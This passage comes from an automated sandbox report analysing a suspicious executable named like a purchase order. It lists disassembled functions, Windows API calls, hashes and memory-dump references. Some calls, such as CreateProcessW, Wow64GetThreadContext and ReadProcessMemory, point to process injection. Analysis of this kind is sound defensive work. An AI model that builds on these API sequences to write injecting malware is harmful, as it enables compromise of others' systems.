                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: File$Delete$Copy
                          • String ID:
                          • API String ID: 3226157194-0
                          • Opcode ID: 345def3206abf8dfe5825146a9cb726757b1a7eba941262d6cdef6ce0535c487
                          • Instruction ID: c62893d6567ea419d96039497b57b04cef74fda70608f56e0c48912edb9ec576
                          • Opcode Fuzzy Hash: 345def3206abf8dfe5825146a9cb726757b1a7eba941262d6cdef6ce0535c487
                          • Instruction Fuzzy Hash: B1B16072E0012DABDF21DFA4CC85EDEB77DEF48350F1080A6F509E6141EA749A44AF61
                          Function 00F03B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 952 f03b1c-f03b27 953 f03b99-f03b9b 952->953 954 f03b29-f03b2e 952->954 956 f03b8c-f03b8f 953->956 954->953 955 f03b30-f03b48 RegOpenKeyExW 954->955 955->953 957 f03b4a-f03b69 RegQueryValueExW 955->957 958 f03b80-f03b8b RegCloseKey 957->958 959 f03b6b-f03b76 957->959 958->956 960 f03b90-f03b97 959->960 961 f03b78-f03b7a 959->961 962 f03b7e 960->962 961->962 962->958
                          APIs
                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00F03B0F,SwapMouseButtons,00000004,?), ref: 00F03B40
                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00F03B0F,SwapMouseButtons,00000004,?), ref: 00F03B61
                          • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00F03B0F,SwapMouseButtons,00000004,?), ref: 00F03B83
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID: Control Panel\Mouse
                          • API String ID: 3677997916-824357125
                          • Opcode ID: 7c70925bc8f4069e433762f3c6f68888d6b3502caa8d75d2647354844f5d427a
                          • Instruction ID: 5a022d55537b29eec4c61317af85d6e6ce9b800aea8aa859e47b01abb6b112f9
                          • Opcode Fuzzy Hash: 7c70925bc8f4069e433762f3c6f68888d6b3502caa8d75d2647354844f5d427a
                          • Instruction Fuzzy Hash: CD112AB5510208FFDB208FA5DC85AAEBBBCEF44758B10445AA805D7160D2319E44B7A0
                          Function 00EB12A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                          Download Yara Rule
                          APIs
                          • CreateProcessW.KERNELBASE(?,00000000), ref: 00EB1A5B
                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00EB1AF1
                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00EB1B13
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657349418.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_eb0000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                          • String ID:
                          • API String ID: 2438371351-0
                          • Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                          • Instruction ID: c238b558a4959b1f4fed8a487876181759d2dec54da564aa7b220918cae7e2bb
                          • Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                          • Instruction Fuzzy Hash: 12620930A14258DBEB24CFA4C851BDEB372EF58304F5091A9E10DFB294E7799E81CB59
                          Function 00F0DFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                          Download Yara Rule
                          Strings
                          • Variable must be of type 'Object'., xrefs: 00F532B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID:
                          • String ID: Variable must be of type 'Object'.
                          • API String ID: 0-109567571
                          • Opcode ID: 2ec5552af5a8b05ea0ff401c452fc63d2656169052bbe10aeaab2da25589ed5c
                          • Instruction ID: 0571da5c015bc78475eea03a88c987b6947256bbb039b0c068035394fdfac95e
                          • Opcode Fuzzy Hash: 2ec5552af5a8b05ea0ff401c452fc63d2656169052bbe10aeaab2da25589ed5c
                          • Instruction Fuzzy Hash: CDC27975E00209CFCB24CF68D880AADBBB1BF18310F248969E955AB391D375ED45FB91
                          Function 00F03923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                          Download Yara Rule
                          APIs
                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F433A2
                            • Part of subcall function 00F06B57: _wcslen.LIBCMT ref: 00F06B6A
                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F03A04
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: IconLoadNotifyShell_String_wcslen
                          • String ID: Line:
                          • API String ID: 2289894680-1585850449
                          • Opcode ID: 9cd8bbd969e409bd25397cda8103ad0dbd6bbe7175676df59132589f93ffd2fe
                          • Instruction ID: 8a46cb66fff2e50cc16bcc75347b498cd94cd8f3490ff35492e758a50d8c19a8
                          • Opcode Fuzzy Hash: 9cd8bbd969e409bd25397cda8103ad0dbd6bbe7175676df59132589f93ffd2fe
                          • Instruction Fuzzy Hash: 3B31C171909304ABD725EB24DC46BEBB7DDAF40720F00492BF599821D1EB789A49F7C2
                          Function 00F1FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                          Download Yara Rule
                          APIs
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00F20668
                            • Part of subcall function 00F232A4: RaiseException.KERNEL32(?,?,?,00F2068A,?,00FD1444,?,?,?,?,?,?,00F2068A,00F01129,00FC8738,00F01129), ref: 00F23304
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00F20685
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Exception@8Throw$ExceptionRaise
                          • String ID: Unknown exception
                          • API String ID: 3476068407-410509341
                          • Opcode ID: bf5d2d0f08d1fb18ad9b0aed0c4d4916fde562e94d8ccd81f677cc2dac764ad5
                          • Instruction ID: c72fcfde132fc30b23875bd30227ec1ace3a84749ee0889933b760b6a9a2ae62
                          • Opcode Fuzzy Hash: bf5d2d0f08d1fb18ad9b0aed0c4d4916fde562e94d8ccd81f677cc2dac764ad5
                          • Instruction Fuzzy Hash: 95F0C23690021DB7CB00B6A4FC46DAE7B6C5E40360B604535B814D65D3EF79EA6AF9C1
                          Function 00F73017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                          Download Yara Rule
                          APIs
                          • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00F7302F
                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00F73044
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Temp$FileNamePath
                          • String ID: aut
                          • API String ID: 3285503233-3010740371
                          • Opcode ID: 777a542cf0bef42d73bc9ab213e96b16a14291f21f797d13c01eaa29c27141b5
                          • Instruction ID: edfdf3764d853fdc272577c19f15a9656c4397f8f258bae87482f2d7a5df2267
                          • Opcode Fuzzy Hash: 777a542cf0bef42d73bc9ab213e96b16a14291f21f797d13c01eaa29c27141b5
                          • Instruction Fuzzy Hash: C5D05E7250032877DA20A7A4AC0EFCB3A6CDB44750F0002A2B655E2091DAB4D984CAE0
                          Function 00F87F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00F882F5
                          • TerminateProcess.KERNEL32(00000000), ref: 00F882FC
                          • FreeLibrary.KERNEL32(?,?,?,?), ref: 00F884DD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Process$CurrentFreeLibraryTerminate
                          • String ID:
                          • API String ID: 146820519-0
                          • Opcode ID: 49948748aa6ffd7e6bd7c1ec54323e0dbb3548329c7ea92b618169fa0df8b448
                          • Instruction ID: 73e27506bd70020a06a8b18d84217fc7202070b135eb22113a13d9cdcf2b993d
                          • Opcode Fuzzy Hash: 49948748aa6ffd7e6bd7c1ec54323e0dbb3548329c7ea92b618169fa0df8b448
                          • Instruction Fuzzy Hash: A4127D71A083019FC714DF28C484B6ABBE1FF84364F54895DE8898B392DB35ED46DB92
                          Function 00F35AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ea5270d955f5e6bfb0be4931106d1dd0dd60eae2d45df50918b06b65d2032ccd
                          • Instruction ID: 80bf0b9e553a5c2f9c3c61519c43024a4bc222a4248735f92fb6656176a223b7
                          • Opcode Fuzzy Hash: ea5270d955f5e6bfb0be4931106d1dd0dd60eae2d45df50918b06b65d2032ccd
                          • Instruction Fuzzy Hash: 7851CE72D00619DBCB219FB4DC45FAEBBB8EF86B34F14005AF405AB291D7399901BB61
                          Function 00F010F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F01BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F01BF4
                            • Part of subcall function 00F01BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00F01BFC
                            • Part of subcall function 00F01BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F01C07
                            • Part of subcall function 00F01BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F01C12
                            • Part of subcall function 00F01BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00F01C1A
                            • Part of subcall function 00F01BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00F01C22
                            • Part of subcall function 00F01B4A: RegisterWindowMessageW.USER32(00000004,?,00F012C4), ref: 00F01BA2
                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00F0136A
                          • OleInitialize.OLE32 ref: 00F01388
                          • CloseHandle.KERNEL32(00000000,00000000), ref: 00F424AB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                          • String ID:
                          • API String ID: 1986988660-0
                          • Opcode ID: 567de959ed1cad6ce646918fb6a88a51eb16aee4cb34ee9932663c15c4becedd
                          • Instruction ID: 9d02bc860cd235ff8bfb6495dbe1d2b50f1d87199351251d2b73f8424ee82989
                          • Opcode Fuzzy Hash: 567de959ed1cad6ce646918fb6a88a51eb16aee4cb34ee9932663c15c4becedd
                          • Instruction Fuzzy Hash: 19716DB5A02208AFD784EFB9BD457553BE3BB89344358826BD40AC73A2EB384445FF51
                          Function 00F054C6 Relevance: 4.6, APIs: 3, Instructions: 103COMMON
                          Download Yara Rule
                          APIs
                          • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 00F0556D
                          • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00F0557D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: FilePointer
                          • String ID:
                          • API String ID: 973152223-0
                          • Opcode ID: 04c761c6103c5097f4cf87af5a643bc148e3e780bf6494a86b42480e98866646
                          • Instruction ID: feb271141d9a1ea0453d232691560d7f1647af6170c78fbda5f6c3a3516d27d4
                          • Opcode Fuzzy Hash: 04c761c6103c5097f4cf87af5a643bc148e3e780bf6494a86b42480e98866646
                          • Instruction Fuzzy Hash: 8D311E75A00609EBDB14CF28CC80BAAB7B5FB44714F188629E91597280D7B1FD94EF90
                          Function 00F386AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00F385CC,?,00FC8CC8,0000000C), ref: 00F38704
                          • GetLastError.KERNEL32(?,00F385CC,?,00FC8CC8,0000000C), ref: 00F3870E
                          • __dosmaperr.LIBCMT ref: 00F38739
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                          • String ID:
                          • API String ID: 490808831-0
                          • Opcode ID: cf92479c57f8724df84733902a9950de761411a6ca685bff3ff5142a0bce332f
                          • Instruction ID: 498dee5beab3cbce2efe33a187ee8076839fbe6648b793653b43fd6d7d1ec16c
                          • Opcode Fuzzy Hash: cf92479c57f8724df84733902a9950de761411a6ca685bff3ff5142a0bce332f
                          • Instruction Fuzzy Hash: 0B012B33E0572416D6246334AD46B7E775A8BC2BF4F39011AF8198B1D2DEAD8C82B190
                          Function 00F72FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00F72CD4,?,?,?,00000004,00000001), ref: 00F72FF2
                          • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00F72CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F73006
                          • CloseHandle.KERNEL32(00000000,?,00F72CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F7300D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: File$CloseCreateHandleTime
                          • String ID:
                          • API String ID: 3397143404-0
                          • Opcode ID: d32fcc9a6ada8ce9e0fbd7e2975872330c08d7f24045d172ffe0c38cd4bf41f8
                          • Instruction ID: c3639689228565cd998dc8225e46f3d5203ec8ac087cfc1264a62cd1e7f6d35c
                          • Opcode Fuzzy Hash: d32fcc9a6ada8ce9e0fbd7e2975872330c08d7f24045d172ffe0c38cd4bf41f8
                          • Instruction Fuzzy Hash: 61E0863268021477E2301755BC0EF8B3A1CD786B75F104211F759750D046A1154162EC
                          Function 00F11310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                          Download Yara Rule
                          APIs
                          • __Init_thread_footer.LIBCMT ref: 00F117F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Init_thread_footer
                          • String ID: CALL
                          • API String ID: 1385522511-4196123274
                          • Opcode ID: 0f582d9830e2f18ff00bc50e47b68e7892f64d56c9e451a1b746cb2c1d27366f
                          • Instruction ID: bdf823ec4f6073af97039700919181458730da79daff19024af50c2b52126257
                          • Opcode Fuzzy Hash: 0f582d9830e2f18ff00bc50e47b68e7892f64d56c9e451a1b746cb2c1d27366f
                          • Instruction Fuzzy Hash: D4229E716083019FC714DF14C890B6ABBF2BF85314F58891DFA968B3A1D735E885EB92
                          Function 00F76EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
                          Download Yara Rule
                          APIs
                          • _wcslen.LIBCMT ref: 00F76F6B
                            • Part of subcall function 00F04ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00FD1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F04EFD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: LibraryLoad_wcslen
                          • String ID: >>>AUTOIT SCRIPT<<<
                          • API String ID: 3312870042-2806939583
                          • Opcode ID: 0980a102f61dfb32a4e7f3fe975b2cc2d62fa6d57c403562ffa82c78761c5e05
                          • Instruction ID: 342e7783a5862e5e227b7400ae17ffe7ffd96c86b871b3fc3e3865b20ee8001c
                          • Opcode Fuzzy Hash: 0980a102f61dfb32a4e7f3fe975b2cc2d62fa6d57c403562ffa82c78761c5e05
                          • Instruction Fuzzy Hash: 98B174715183018FCB14EF20CC919AEB7E5AF94310F44895DF49A972A2EB34ED49FB92
                          Function 00F02DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                          Download Yara Rule
                          APIs
                          • GetOpenFileNameW.COMDLG32(?), ref: 00F42C8C
                            • Part of subcall function 00F03AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F03A97,?,?,00F02E7F,?,?,?,00000000), ref: 00F03AC2
                            • Part of subcall function 00F02DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F02DC4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Name$Path$FileFullLongOpen
                          • String ID: X
                          • API String ID: 779396738-3081909835
                          • Opcode ID: 910fa07ef35dcd2be8d3c029c8e041de4403807c96a540e473bdaa80e4b21bd7
                          • Instruction ID: 5b14fa2ea7775bc7710fa1631ace704a803c33c7cc4e3018c789fcbc8585d78c
                          • Opcode Fuzzy Hash: 910fa07ef35dcd2be8d3c029c8e041de4403807c96a540e473bdaa80e4b21bd7
                          • Instruction Fuzzy Hash: 74219671A002589BDB45DF94CC49BEE7BFCAF49314F00405AE905E7282DBB85989AB61
                          Function 00F72557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: __fread_nolock
                          • String ID: EA06
                          • API String ID: 2638373210-3962188686
                          • Opcode ID: 50d2bd30853fb886446939a5aac28bebb68740f3552ba5f7155d8a329c144b04
                          • Instruction ID: 217a24ba877bdd7e2fed72f793c74e57ceba2ef175745ded3ead7aac6e486535
                          • Opcode Fuzzy Hash: 50d2bd30853fb886446939a5aac28bebb68740f3552ba5f7155d8a329c144b04
                          • Instruction Fuzzy Hash: DB01B5729442687EDF18C7A8CC56FEEBBF89B15311F04455AE192D2181E5B8E6089B60
                          Function 00F03837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                          Download Yara Rule
                          APIs
                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F03908
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
